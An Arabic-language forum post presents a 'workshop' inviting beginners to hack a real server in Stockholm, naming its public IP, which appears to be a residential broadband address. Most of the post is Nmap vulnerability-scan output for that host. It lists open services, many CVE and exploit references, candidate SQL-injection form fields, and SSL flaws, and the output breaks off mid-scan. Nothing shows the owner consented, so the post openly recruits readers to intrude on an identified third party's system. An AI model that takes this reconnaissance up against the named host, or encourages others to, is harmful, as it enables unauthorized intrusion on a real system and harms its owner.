ورشة عمل لأختراق سيرفر فى دولة السويد 001

x32x01 · الأحد في 13:01

طبعا يا شباب اللى عايز يبدأ معانا
والشباب اللى لسه مبتدأ فى طريق السايبر سيكيورتى
الكل يشارك معانا عشان تتعلم

عشان تفيد وتستفيد وأطرح الكثير من ورش العمل

نبدأ مع بعض أول ورشة عمل لأختراق سيرفر حقيقى فى دولة السويد وبالتحديد فى ستوكهولم
السيرفر هو : 83.251.235.155

وطبعا السيرفر به ثغرات بالجملة
كل واحد يشارك معانا ويقول هو وصل لايه (عشان طبعا الكل يستفاد ويكون فيه تفاعل)

Bash:

Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-08-03 11:06 EEST
Nmap scan report for c83-251-235-155.bredband.tele2.se (83.251.235.155)
Host is up (0.093s latency).
Not shown: 846 closed tcp ports (reset), 120 filtered tcp ports (no-response), 1 filtered tcp ports (host-unreach)
PORT      STATE SERVICE            VERSION
21/tcp    open  ftp                vsftpd 2.0.8 or later
22/tcp    open  ssh                OpenSSH 5.9 (protocol 2.0)
| vulners:
|   cpe:/a:openbsd:openssh:5.9:
|         95499236-C9FE-56A6-9D7D-E943A24B633A    10.0    https://vulners.com/githubexploit/95499236-C9FE-56A6-9D7D-E943A24B633A    *EXPLOIT*
|         5E6968B4-DBD6-57FA-BF6E-D9B2219DB27A    10.0    https://vulners.com/githubexploit/5E6968B4-DBD6-57FA-BF6E-D9B2219DB27A    *EXPLOIT*
|         2C119FFA-ECE0-5E14-A4A4-354A2C38071A    10.0    https://vulners.com/githubexploit/2C119FFA-ECE0-5E14-A4A4-354A2C38071A    *EXPLOIT*
|         PACKETSTORM:173661    9.8    https://vulners.com/packetstorm/PACKETSTORM:173661    *EXPLOIT*
|         F0979183-AE88-53B4-86CF-3AF0523F3807    9.8    https://vulners.com/githubexploit/F0979183-AE88-53B4-86CF-3AF0523F3807    *EXPLOIT*
|         CVE-2023-38408    9.8    https://vulners.com/cve/CVE-2023-38408
|         CVE-2016-1908    9.8    https://vulners.com/cve/CVE-2016-1908
|         B8190CDB-3EB9-5631-9828-8064A1575B23    9.8    https://vulners.com/githubexploit/B8190CDB-3EB9-5631-9828-8064A1575B23    *EXPLOIT*
|         8FC9C5AB-3968-5F3C-825E-E8DB5379A623    9.8    https://vulners.com/githubexploit/8FC9C5AB-3968-5F3C-825E-E8DB5379A623    *EXPLOIT*
|         8AD01159-548E-546E-AA87-2DE89F3927EC    9.8    https://vulners.com/githubexploit/8AD01159-548E-546E-AA87-2DE89F3927EC    *EXPLOIT*
|         2227729D-6700-5C8F-8930-1EEAFD4B9FF0    9.8    https://vulners.com/githubexploit/2227729D-6700-5C8F-8930-1EEAFD4B9FF0    *EXPLOIT*
|         0221525F-07F5-5790-912D-F4B9E2D1B587    9.8    https://vulners.com/githubexploit/0221525F-07F5-5790-912D-F4B9E2D1B587    *EXPLOIT*
|         CVE-2015-5600    8.5    https://vulners.com/cve/CVE-2015-5600
|         CVE-2016-0778    8.1    https://vulners.com/cve/CVE-2016-0778
|         PACKETSTORM:140070    7.8    https://vulners.com/packetstorm/PACKETSTORM:140070    *EXPLOIT*
|         EXPLOITPACK:5BCA798C6BA71FAE29334297EC0B6A09    7.8    https://vulners.com/exploitpack/EXPLOITPACK:5BCA798C6BA71FAE29334297EC0B6A09    *EXPLOIT*
|         EDB-ID:40888    7.8    https://vulners.com/exploitdb/EDB-ID:40888    *EXPLOIT*
|         CVE-2020-15778    7.8    https://vulners.com/cve/CVE-2020-15778
|         CVE-2016-6515    7.8    https://vulners.com/cve/CVE-2016-6515
|         CVE-2016-10012    7.8    https://vulners.com/cve/CVE-2016-10012
|         CVE-2015-8325    7.8    https://vulners.com/cve/CVE-2015-8325
|         C94132FD-1FA5-5342-B6EE-0DAF45EEFFE3    7.8    https://vulners.com/githubexploit/C94132FD-1FA5-5342-B6EE-0DAF45EEFFE3    *EXPLOIT*
|         1337DAY-ID-26494    7.8    https://vulners.com/zdt/1337DAY-ID-26494    *EXPLOIT*
|         10213DBE-F683-58BB-B6D3-353173626207    7.8    https://vulners.com/githubexploit/10213DBE-F683-58BB-B6D3-353173626207    *EXPLOIT*
|         SSV:92579    7.5    https://vulners.com/seebug/SSV:92579    *EXPLOIT*
|         SSV:61450    7.5    https://vulners.com/seebug/SSV:61450    *EXPLOIT*
|         CVE-2016-10708    7.5    https://vulners.com/cve/CVE-2016-10708
|         CVE-2016-10009    7.5    https://vulners.com/cve/CVE-2016-10009
|         CVE-2014-1692    7.5    https://vulners.com/cve/CVE-2014-1692
|         1337DAY-ID-26576    7.5    https://vulners.com/zdt/1337DAY-ID-26576    *EXPLOIT*
|         SSV:92582    7.2    https://vulners.com/seebug/SSV:92582    *EXPLOIT*
|         CVE-2016-10010    7.0    https://vulners.com/cve/CVE-2016-10010
|         SSV:92580    6.9    https://vulners.com/seebug/SSV:92580    *EXPLOIT*
|         CVE-2015-6564    6.9    https://vulners.com/cve/CVE-2015-6564
|         1337DAY-ID-26577    6.9    https://vulners.com/zdt/1337DAY-ID-26577    *EXPLOIT*
|         EDB-ID:46516    6.8    https://vulners.com/exploitdb/EDB-ID:46516    *EXPLOIT*
|         EDB-ID:46193    6.8    https://vulners.com/exploitdb/EDB-ID:46193    *EXPLOIT*
|         CVE-2019-6110    6.8    https://vulners.com/cve/CVE-2019-6110
|         CVE-2019-6109    6.8    https://vulners.com/cve/CVE-2019-6109
|         1337DAY-ID-32328    6.8    https://vulners.com/zdt/1337DAY-ID-32328    *EXPLOIT*
|         1337DAY-ID-32009    6.8    https://vulners.com/zdt/1337DAY-ID-32009    *EXPLOIT*
|         CVE-2023-51385    6.5    https://vulners.com/cve/CVE-2023-51385
|         CVE-2016-0777    6.5    https://vulners.com/cve/CVE-2016-0777
|         EDB-ID:40858    6.4    https://vulners.com/exploitdb/EDB-ID:40858    *EXPLOIT*
|         EDB-ID:40119    6.4    https://vulners.com/exploitdb/EDB-ID:40119    *EXPLOIT*
|         EDB-ID:39569    6.4    https://vulners.com/exploitdb/EDB-ID:39569    *EXPLOIT*
|         CVE-2016-3115    6.4    https://vulners.com/cve/CVE-2016-3115
|         PACKETSTORM:181223    5.9    https://vulners.com/packetstorm/PACKETSTORM:181223    *EXPLOIT*
|         MSF:AUXILIARY-SCANNER-SSH-SSH_ENUMUSERS-    5.9    https://vulners.com/metasploit/MSF:AUXILIARY-SCANNER-SSH-SSH_ENUMUSERS-    *EXPLOIT*
|         EDB-ID:40136    5.9    https://vulners.com/exploitdb/EDB-ID:40136    *EXPLOIT*
|         EDB-ID:40113    5.9    https://vulners.com/exploitdb/EDB-ID:40113    *EXPLOIT*
|         CVE-2023-48795    5.9    https://vulners.com/cve/CVE-2023-48795
|         CVE-2020-14145    5.9    https://vulners.com/cve/CVE-2020-14145
|         CVE-2019-6111    5.9    https://vulners.com/cve/CVE-2019-6111
|         CVE-2016-6210    5.9    https://vulners.com/cve/CVE-2016-6210
|         CC3AE4FC-CF04-5EDA-A010-6D7E71538C92    5.9    https://vulners.com/githubexploit/CC3AE4FC-CF04-5EDA-A010-6D7E71538C92    *EXPLOIT*
|         C190A2C8-A86F-571E-826A-06D02604D9B3    5.9    https://vulners.com/githubexploit/C190A2C8-A86F-571E-826A-06D02604D9B3    *EXPLOIT*
|         54E1BB01-2C69-5AFD-A23D-9783C9D9FC4C    5.9    https://vulners.com/githubexploit/54E1BB01-2C69-5AFD-A23D-9783C9D9FC4C    *EXPLOIT*
|         SSV:61911    5.8    https://vulners.com/seebug/SSV:61911    *EXPLOIT*
|         EXPLOITPACK:98FE96309F9524B8C84C508837551A19    5.8    https://vulners.com/exploitpack/EXPLOITPACK:98FE96309F9524B8C84C508837551A19    *EXPLOIT*
|         EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97    5.8    https://vulners.com/exploitpack/EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97    *EXPLOIT*
|         CVE-2014-2653    5.8    https://vulners.com/cve/CVE-2014-2653
|         CVE-2014-2532    5.8    https://vulners.com/cve/CVE-2014-2532
|         SSV:91041    5.5    https://vulners.com/seebug/SSV:91041    *EXPLOIT*
|         PACKETSTORM:140019    5.5    https://vulners.com/packetstorm/PACKETSTORM:140019    *EXPLOIT*
|         PACKETSTORM:136251    5.5    https://vulners.com/packetstorm/PACKETSTORM:136251    *EXPLOIT*
|         PACKETSTORM:136234    5.5    https://vulners.com/packetstorm/PACKETSTORM:136234    *EXPLOIT*
|         EXPLOITPACK:F92411A645D85F05BDBD274FD222226F    5.5    https://vulners.com/exploitpack/EXPLOITPACK:F92411A645D85F05BDBD274FD222226F    *EXPLOIT*
|         EXPLOITPACK:9F2E746846C3C623A27A441281EAD138    5.5    https://vulners.com/exploitpack/EXPLOITPACK:9F2E746846C3C623A27A441281EAD138    *EXPLOIT*
|         EXPLOITPACK:1902C998CBF9154396911926B4C3B330    5.5    https://vulners.com/exploitpack/EXPLOITPACK:1902C998CBF9154396911926B4C3B330    *EXPLOIT*
|         CVE-2016-10011    5.5    https://vulners.com/cve/CVE-2016-10011
|         1337DAY-ID-25388    5.5    https://vulners.com/zdt/1337DAY-ID-25388    *EXPLOIT*
|         EDB-ID:45939    5.3    https://vulners.com/exploitdb/EDB-ID:45939    *EXPLOIT*
|         EDB-ID:45233    5.3    https://vulners.com/exploitdb/EDB-ID:45233    *EXPLOIT*
|         CVE-2018-20685    5.3    https://vulners.com/cve/CVE-2018-20685
|         CVE-2018-15919    5.3    https://vulners.com/cve/CVE-2018-15919
|         CVE-2018-15473    5.3    https://vulners.com/cve/CVE-2018-15473
|         CVE-2017-15906    5.3    https://vulners.com/cve/CVE-2017-15906
|         CVE-2016-20012    5.3    https://vulners.com/cve/CVE-2016-20012
|         1337DAY-ID-31730    5.3    https://vulners.com/zdt/1337DAY-ID-31730    *EXPLOIT*
|         SSV:60656    5.0    https://vulners.com/seebug/SSV:60656    *EXPLOIT*
|         SSH_ENUM    5.0    https://vulners.com/canvas/SSH_ENUM    *EXPLOIT*
|         PACKETSTORM:150621    5.0    https://vulners.com/packetstorm/PACKETSTORM:150621    *EXPLOIT*
|         EXPLOITPACK:F957D7E8A0CC1E23C3C649B764E13FB0    5.0    https://vulners.com/exploitpack/EXPLOITPACK:F957D7E8A0CC1E23C3C649B764E13FB0    *EXPLOIT*
|         EXPLOITPACK:EBDBC5685E3276D648B4D14B75563283    5.0    https://vulners.com/exploitpack/EXPLOITPACK:EBDBC5685E3276D648B4D14B75563283    *EXPLOIT*
|         CVE-2010-5107    5.0    https://vulners.com/cve/CVE-2010-5107
|         SSV:90447    4.6    https://vulners.com/seebug/SSV:90447    *EXPLOIT*
|         EXPLOITPACK:802AF3229492E147A5F09C7F2B27C6DF    4.3    https://vulners.com/exploitpack/EXPLOITPACK:802AF3229492E147A5F09C7F2B27C6DF    *EXPLOIT*
|         EXPLOITPACK:5652DDAA7FE452E19AC0DC1CD97BA3EF    4.3    https://vulners.com/exploitpack/EXPLOITPACK:5652DDAA7FE452E19AC0DC1CD97BA3EF    *EXPLOIT*
|         CVE-2015-5352    4.3    https://vulners.com/cve/CVE-2015-5352
|         1337DAY-ID-25440    4.3    https://vulners.com/zdt/1337DAY-ID-25440    *EXPLOIT*
|         1337DAY-ID-25438    4.3    https://vulners.com/zdt/1337DAY-ID-25438    *EXPLOIT*
|         CVE-2021-36368    3.7    https://vulners.com/cve/CVE-2021-36368
|         SSV:92581    2.1    https://vulners.com/seebug/SSV:92581    *EXPLOIT*
|         CVE-2015-6563    1.9    https://vulners.com/cve/CVE-2015-6563
|         PACKETSTORM:151227    0.0    https://vulners.com/packetstorm/PACKETSTORM:151227    *EXPLOIT*
|         PACKETSTORM:140261    0.0    https://vulners.com/packetstorm/PACKETSTORM:140261    *EXPLOIT*
|         PACKETSTORM:138006    0.0    https://vulners.com/packetstorm/PACKETSTORM:138006    *EXPLOIT*
|         PACKETSTORM:137942    0.0    https://vulners.com/packetstorm/PACKETSTORM:137942    *EXPLOIT*
|         1337DAY-ID-30937    0.0    https://vulners.com/zdt/1337DAY-ID-30937    *EXPLOIT*
|         1337DAY-ID-26468    0.0    https://vulners.com/zdt/1337DAY-ID-26468    *EXPLOIT*
|_        1337DAY-ID-25391    0.0    https://vulners.com/zdt/1337DAY-ID-25391    *EXPLOIT*
23/tcp    open  telnet             Linux telnetd
25/tcp    open  smtp               Sendmail 8.14.5/8.14.5
| smtp-vuln-cve2010-4344:
|_  The SMTP server is not Exim: NOT VULNERABLE
| vulners:
|   cpe:/a:sendmail:sendmail:8.14.5%2F8.14.5:
|         CVE-2021-3618    7.4    https://vulners.com/cve/CVE-2021-3618
|         CVE-2023-51765    5.3    https://vulners.com/cve/CVE-2023-51765
|         32090D10-FC99-5944-BC29-1F630D06F766    5.3    https://vulners.com/githubexploit/32090D10-FC99-5944-BC29-1F630D06F766    *EXPLOIT*
|_        CVE-2014-3956    1.9    https://vulners.com/cve/CVE-2014-3956
53/tcp    open  domain             ISC BIND 9.8.4-P1 (Fedora Core 16)
| vulners:
|   cpe:/a:isc:bind:9.8.4-p1:
|         CVE-2021-25216    9.8    https://vulners.com/cve/CVE-2021-25216
|         CVE-2020-8616    8.6    https://vulners.com/cve/CVE-2020-8616
|         CVE-2016-1286    8.6    https://vulners.com/cve/CVE-2016-1286
|         CVE-2020-8625    8.1    https://vulners.com/cve/CVE-2020-8625
|         SSV:60926    7.8    https://vulners.com/seebug/SSV:60926    *EXPLOIT*
|         SSV:60714    7.8    https://vulners.com/seebug/SSV:60714    *EXPLOIT*
|         PACKETSTORM:180552    7.8    https://vulners.com/packetstorm/PACKETSTORM:180552    *EXPLOIT*
|         PACKETSTORM:180551    7.8    https://vulners.com/packetstorm/PACKETSTORM:180551    *EXPLOIT*
|         PACKETSTORM:138960    7.8    https://vulners.com/packetstorm/PACKETSTORM:138960    *EXPLOIT*
|         PACKETSTORM:132926    7.8    https://vulners.com/packetstorm/PACKETSTORM:132926    *EXPLOIT*
|         MSF:AUXILIARY-DOS-DNS-BIND_TKEY-    7.8    https://vulners.com/metasploit/MSF:AUXILIARY-DOS-DNS-BIND_TKEY-    *EXPLOIT*
|         EXPLOITPACK:BE4F638B632EA0754155A27ECC4B3D3F    7.8    https://vulners.com/exploitpack/EXPLOITPACK:BE4F638B632EA0754155A27ECC4B3D3F    *EXPLOIT*
|         EXPLOITPACK:46DEBFAC850194C04C54F93E0DFF5F4F    7.8    https://vulners.com/exploitpack/EXPLOITPACK:46DEBFAC850194C04C54F93E0DFF5F4F    *EXPLOIT*
|         EXPLOITPACK:09762DB0197BBAAAB6FC79F24F0D2A74    7.8    https://vulners.com/exploitpack/EXPLOITPACK:09762DB0197BBAAAB6FC79F24F0D2A74    *EXPLOIT*
|         EDB-ID:42121    7.8    https://vulners.com/exploitdb/EDB-ID:42121    *EXPLOIT*
|         EDB-ID:40453    7.8    https://vulners.com/exploitdb/EDB-ID:40453    *EXPLOIT*
|         EDB-ID:37723    7.8    https://vulners.com/exploitdb/EDB-ID:37723    *EXPLOIT*
|         EDB-ID:37721    7.8    https://vulners.com/exploitdb/EDB-ID:37721    *EXPLOIT*
|         CVE-2017-3141    7.8    https://vulners.com/cve/CVE-2017-3141
|         CVE-2016-2776    7.8    https://vulners.com/cve/CVE-2016-2776
|         CVE-2015-5722    7.8    https://vulners.com/cve/CVE-2015-5722
|         CVE-2015-5477    7.8    https://vulners.com/cve/CVE-2015-5477
|         CVE-2015-4620    7.8    https://vulners.com/cve/CVE-2015-4620
|         CVE-2014-8500    7.8    https://vulners.com/cve/CVE-2014-8500
|         CVE-2013-4854    7.8    https://vulners.com/cve/CVE-2013-4854
|         CVE-2013-2266    7.8    https://vulners.com/cve/CVE-2013-2266
|         1337DAY-ID-25325    7.8    https://vulners.com/zdt/1337DAY-ID-25325    *EXPLOIT*
|         1337DAY-ID-23970    7.8    https://vulners.com/zdt/1337DAY-ID-23970    *EXPLOIT*
|         1337DAY-ID-23960    7.8    https://vulners.com/zdt/1337DAY-ID-23960    *EXPLOIT*
|         1337DAY-ID-23948    7.8    https://vulners.com/zdt/1337DAY-ID-23948    *EXPLOIT*
|         PACKETSTORM:180550    7.5    https://vulners.com/packetstorm/PACKETSTORM:180550    *EXPLOIT*
|         MSF:AUXILIARY-DOS-DNS-BIND_TSIG_BADTIME-    7.5    https://vulners.com/metasploit/MSF:AUXILIARY-DOS-DNS-BIND_TSIG_BADTIME-    *EXPLOIT*
|         MSF:AUXILIARY-DOS-DNS-BIND_TSIG-    7.5    https://vulners.com/metasploit/MSF:AUXILIARY-DOS-DNS-BIND_TSIG-    *EXPLOIT*
|         FBC03933-7A65-52F3-83F4-4B2253A490B6    7.5    https://vulners.com/githubexploit/FBC03933-7A65-52F3-83F4-4B2253A490B6    *EXPLOIT*
|         CVE-2023-50387    7.5    https://vulners.com/cve/CVE-2023-50387
|         CVE-2023-4408    7.5    https://vulners.com/cve/CVE-2023-4408
|         CVE-2023-3341    7.5    https://vulners.com/cve/CVE-2023-3341
|         CVE-2022-38177    7.5    https://vulners.com/cve/CVE-2022-38177
|         CVE-2021-25215    7.5    https://vulners.com/cve/CVE-2021-25215
|         CVE-2020-8617    7.5    https://vulners.com/cve/CVE-2020-8617
|         CVE-2018-5740    7.5    https://vulners.com/cve/CVE-2018-5740
|         CVE-2017-3145    7.5    https://vulners.com/cve/CVE-2017-3145
|         CVE-2017-3143    7.5    https://vulners.com/cve/CVE-2017-3143
|         CVE-2016-9131    7.5    https://vulners.com/cve/CVE-2016-9131
|         CVE-2016-8864    7.5    https://vulners.com/cve/CVE-2016-8864
|         CVE-2016-2848    7.5    https://vulners.com/cve/CVE-2016-2848
|         CE8366BE-F17D-552A-B1B4-C2DBD31482C0    7.5    https://vulners.com/githubexploit/CE8366BE-F17D-552A-B1B4-C2DBD31482C0    *EXPLOIT*
|         BB688FBF-CEE2-5DD1-8561-8F76501DE2D4    7.5    https://vulners.com/githubexploit/BB688FBF-CEE2-5DD1-8561-8F76501DE2D4    *EXPLOIT*
|         5EFDF373-FBD1-5C09-A612-00ADBFE574CF    7.5    https://vulners.com/githubexploit/5EFDF373-FBD1-5C09-A612-00ADBFE574CF    *EXPLOIT*
|         1337DAY-ID-34485    7.5    https://vulners.com/zdt/1337DAY-ID-34485    *EXPLOIT*
|         EXPLOITPACK:D6DDF5E24DE171DAAD71FD95FC1B67F2    7.2    https://vulners.com/exploitpack/EXPLOITPACK:D6DDF5E24DE171DAAD71FD95FC1B67F2    *EXPLOIT*
|         SSV:60609    7.1    https://vulners.com/seebug/SSV:60609    *EXPLOIT*
|         CVE-2015-8461    7.1    https://vulners.com/cve/CVE-2015-8461
|         CVE-2015-5986    7.1    https://vulners.com/cve/CVE-2015-5986
|         CVE-2012-5689    7.1    https://vulners.com/cve/CVE-2012-5689
|         CVE-2016-1285    6.8    https://vulners.com/cve/CVE-2016-1285
|         CVE-2013-6230    6.8    https://vulners.com/cve/CVE-2013-6230
|         CVE-2020-8622    6.5    https://vulners.com/cve/CVE-2020-8622
|         CVE-2018-5741    6.5    https://vulners.com/cve/CVE-2018-5741
|         CVE-2016-6170    6.5    https://vulners.com/cve/CVE-2016-6170
|         CVE-2017-3136    5.9    https://vulners.com/cve/CVE-2017-3136
|         CVE-2016-2775    5.9    https://vulners.com/cve/CVE-2016-2775
|         CVE-2013-5661    5.9    https://vulners.com/cve/CVE-2013-5661
|         CVE-2015-1349    5.4    https://vulners.com/cve/CVE-2015-1349
|         CVE-2022-2795    5.3    https://vulners.com/cve/CVE-2022-2795
|         CVE-2021-25219    5.3    https://vulners.com/cve/CVE-2021-25219
|         CVE-2017-3142    5.3    https://vulners.com/cve/CVE-2017-3142
|         PACKETSTORM:157836    5.0    https://vulners.com/packetstorm/PACKETSTORM:157836    *EXPLOIT*
|         CVE-2015-8000    5.0    https://vulners.com/cve/CVE-2015-8000
|         SSV:61337    2.6    https://vulners.com/seebug/SSV:61337    *EXPLOIT*
|         CVE-2014-0591    2.6    https://vulners.com/cve/CVE-2014-0591
|         PACKETSTORM:142800    0.0    https://vulners.com/packetstorm/PACKETSTORM:142800    *EXPLOIT*
|_        1337DAY-ID-27896    0.0    https://vulners.com/zdt/1337DAY-ID-27896    *EXPLOIT*
80/tcp    open  http               Apache httpd 2.2.22 ((Fedora))
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=c83-251-235-155.bredband.tele2.se
|   Found the following possible CSRF vulnerabilities:
|     
|     Path: http://c83-251-235-155.bredband.tele2.se:80/menu.php?lang=en
|     Form id:
|     Form action: index.php
|     
|     Path: http://c83-251-235-155.bredband.tele2.se:80/intro.php
|     Form id:
|     Form action: http://www.polarhome.com/service/phpoll/phpPollCollector.php3
|     
|     Path: http://c83-251-235-155.bredband.tele2.se:80/intro.php
|     Form id:
|     Form action: http://www.google.com/custom
|     
|     Path: http://c83-251-235-155.bredband.tele2.se:80/vim/?lang=en
|     Form id:
|     Form action: http://www.polarhome.com/service/phpoll/phpPollCollector.php3
|     
|     Path: http://c83-251-235-155.bredband.tele2.se:80/vim/?lang=en
|     Form id:
|     Form action: http://www.polarhome.com/service/phpoll/phpPollCollector.php3
|     
|     Path: http://c83-251-235-155.bredband.tele2.se:80/openssl/?lang=en
|     Form id:
|_    Form action: http://www.polarhome.com/service/phpoll/phpPollCollector.php3
| http-sql-injection:
|   Possible sqli for forms:
|     Form at path: /intro.php, form's action: http://www.polarhome.com/service/phpoll/phpPollCollector.php3. Fields that might be vulnerable:
|       poll_voteNr
|       poll_voteNr
|       poll_voteNr
|       poll_voteNr
|       poll_voteNr
|       poll_voteNr
|       poll_voteNr
|     Form at path: /vim/, form's action: http://www.polarhome.com/service/phpoll/phpPollCollector.php3. Fields that might be vulnerable:
|       poll_voteNr
|       poll_voteNr
|       poll_voteNr
|       poll_voteNr
|       poll_voteNr
|       poll_voteNr
|       poll_voteNr
|       poll_voteNr
|     Form at path: /vim/, form's action: http://www.polarhome.com/service/phpoll/phpPollCollector.php3. Fields that might be vulnerable:
|       poll_voteNr
|       poll_voteNr
|       poll_voteNr
|       poll_voteNr
|       poll_voteNr
|     Form at path: /openssl/, form's action: http://www.polarhome.com/service/phpoll/phpPollCollector.php3. Fields that might be vulnerable:
|       poll_voteNr
|       poll_voteNr
|       poll_voteNr
|       poll_voteNr
|       poll_voteNr
|       poll_voteNr
|       poll_voteNr
|_      poll_voteNr
| http-enum:
|   /svn/: Possible code repository
|   /cvs/: Possible code repository
|   /forum/: Forum
|   /robots.txt: Robots file
|   /forum/docs/CHANGELOG.html: phpBB version slightly newer than 3.0.11
|   /css/: Potentially interesting folder
|   /error.html: Potentially interesting folder
|   /icons/: Potentially interesting folder w/ directory listing
|_  /images/: Potentially interesting folder
| http-fileupload-exploiter:
|   
|     Couldn't find a file-type field.
|   
|_    Couldn't find a file-type field.
|_http-trace: TRACE is enabled
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-server-header: Apache/2.2.22 (Fedora)
110/tcp   open  pop3               Dovecot pop3d
| ssl-dh-params:
|   VULNERABLE:
|   Diffie-Hellman Key Exchange Insufficient Group Strength
|     State: VULNERABLE
|       Transport Layer Security (TLS) services that use Diffie-Hellman groups
|       of insufficient strength, especially those using one of a few commonly
|       shared groups, may be susceptible to passive eavesdropping attacks.
|     Check results:
|       WEAK DH GROUP 1
|             Cipher Suite: TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA
|             Modulus Type: Safe prime
|             Modulus Source: Unknown/Custom-generated
|             Modulus Length: 1024
|             Generator Length: 8
|             Public Key Length: 1024
|     References:
|_      https://weakdh.org
| ssl-ccs-injection:
|   VULNERABLE:
|   SSL/TLS MITM vulnerability (CCS Injection)
|     State: VULNERABLE
|     Risk factor: High
|       OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h
|       does not properly restrict processing of ChangeCipherSpec messages,
|       which allows man-in-the-middle attackers to trigger use of a zero
|       length master key in certain OpenSSL-to-OpenSSL communications, and
|       consequently hijack sessions or obtain sensitive information, via
|       a crafted TLS handshake, aka the "CCS Injection" vulnerability.
|           
|     References:
|       http://www.openssl.org/news/secadv_20140605.txt
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224
|_      http://www.cvedetails.com/cve/2014-0224
| ssl-poodle:
|   VULNERABLE:
|   SSL POODLE information leak
|     State: VULNERABLE
|     IDs:  CVE:CVE-2014-3566  BID:70574
|           The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
|           products, uses nondeterministic CBC padding, which makes it easier
|           for man-in-the-middle attackers to obtain cleartext data via a
|           padding-oracle attack, aka the "POODLE" issue.
|     Disclosure date: 2014-10-14
|     Check results:
|       TLS_RSA_WITH_AES_128_CBC_SHA
|     References:
|       https://www.imperialviolet.org/2014/10/14/poodle.html
|       https://www.openssl.org/~bodo/ssl-poodle.pdf
|       https://www.securityfocus.com/bid/70574
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
143/tcp   open  imap               Dovecot imapd
| ssl-dh-params:
|   VULNERABLE:
|   Diffie-Hellman Key Exchange Insufficient Group Strength
|     State: VULNERABLE
|       Transport Layer Security (TLS) services that use Diffie-Hellman groups
|       of insufficient strength, especially those using one of a few commonly
|       shared groups, may be susceptible to passive eavesdropping attacks.
|     Check results:
|       WEAK DH GROUP 1
|             Cipher Suite: TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA
|             Modulus Type: Safe prime
|             Modulus Source: Unknown/Custom-generated
|             Modulus Length: 1024
|             Generator Length: 8
|             Public Key Length: 1024
|     References:
|_      https://weakdh.org
| ssl-poodle:
|   VULNERABLE:
|   SSL POODLE information leak
|     State: VULNERABLE
|     IDs:  CVE:CVE-2014-3566  BID:70574
|           The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
|           products, uses nondeterministic CBC padding, which makes it easier
|           for man-in-the-middle attackers to obtain cleartext data via a
|           padding-oracle attack, aka the "POODLE" issue.
|     Disclosure date: 2014-10-14
|     Check results:
|       TLS_RSA_WITH_AES_128_CBC_SHA
|     References:
|       https://www.imperialviolet.org/2014/10/14/poodle.html
|       https://www.openssl.org/~bodo/ssl-poodle.pdf
|       https://www.securityfocus.com/bid/70574
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
| ssl-ccs-injection:
|   VULNERABLE:
|   SSL/TLS MITM vulnerability (CCS Injection)
|     State: VULNERABLE
|     Risk factor: High
|       OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h
|       does not properly restrict processing of ChangeCipherSpec messages,
|       which allows man-in-the-middle attackers to trigger use of a zero
|       length master key in certain OpenSSL-to-OpenSSL communications, and
|       consequently hijack sessions or obtain sensitive information, via
|       a crafted TLS handshake, aka the "CCS Injection" vulnerability.
|           
|     References:
|       http://www.openssl.org/news/secadv_20140605.txt
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224
|_      http://www.cvedetails.com/cve/2014-0224
443/tcp   open  ssl/https?
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)
| ssl-ccs-injection:
|   VULNERABLE:
|   SSL/TLS MITM vulnerability (CCS Injection)
|     State: VULNERABLE
|     Risk factor: High
|       OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h
|       does not properly restrict processing of ChangeCipherSpec messages,
|       which allows man-in-the-middle attackers to trigger use of a zero
|       length master key in certain OpenSSL-to-OpenSSL communications, and
|       consequently hijack sessions or obtain sensitive information, via
|       a crafted TLS handshake, aka the "CCS Injection" vulnerability.
|           
|     References:
|       http://www.openssl.org/news/secadv_20140605.txt
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224
|_      http://www.cvedetails.com/cve/2014-0224
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
| ssl-dh-params:
|   VULNERABLE:
|   Diffie-Hellman Key Exchange Insufficient Group Strength
|     State: VULNERABLE
|       Transport Layer Security (TLS) services that use Diffie-Hellman groups
|       of insufficient strength, especially those using one of a few commonly
|       shared groups, may be susceptible to passive eavesdropping attacks.
|     Check results:
|       WEAK DH GROUP 1
|             Cipher Suite: TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA
|             Modulus Type: Safe prime
|             Modulus Source: mod_ssl 2.2.x/1024-bit MODP group with safe prime modulus
|             Modulus Length: 1024
|             Generator Length: 8
|             Public Key Length: 1024
|     References:
|_      https://weakdh.org
| ssl-poodle:
|   VULNERABLE:
|   SSL POODLE information leak
|     State: VULNERABLE
|     IDs:  CVE:CVE-2014-3566  BID:70574
|           The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
|           products, uses nondeterministic CBC padding, which makes it easier
|           for man-in-the-middle attackers to obtain cleartext data via a
|           padding-oracle attack, aka the "POODLE" issue.
|     Disclosure date: 2014-10-14
|     Check results:
|       TLS_RSA_WITH_AES_128_CBC_SHA
|     References:
|       https://www.imperialviolet.org/2014/10/14/poodle.html
|       https://www.openssl.org/~bodo/ssl-poodle.pdf
|       https://www.securityfocus.com/bid/70574
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
|_http-csrf: Couldn't find any CSRF vulnerabilities.
646/tcp   open  pop3
| fingerprint-strings:
|   GenericLines, NULL:
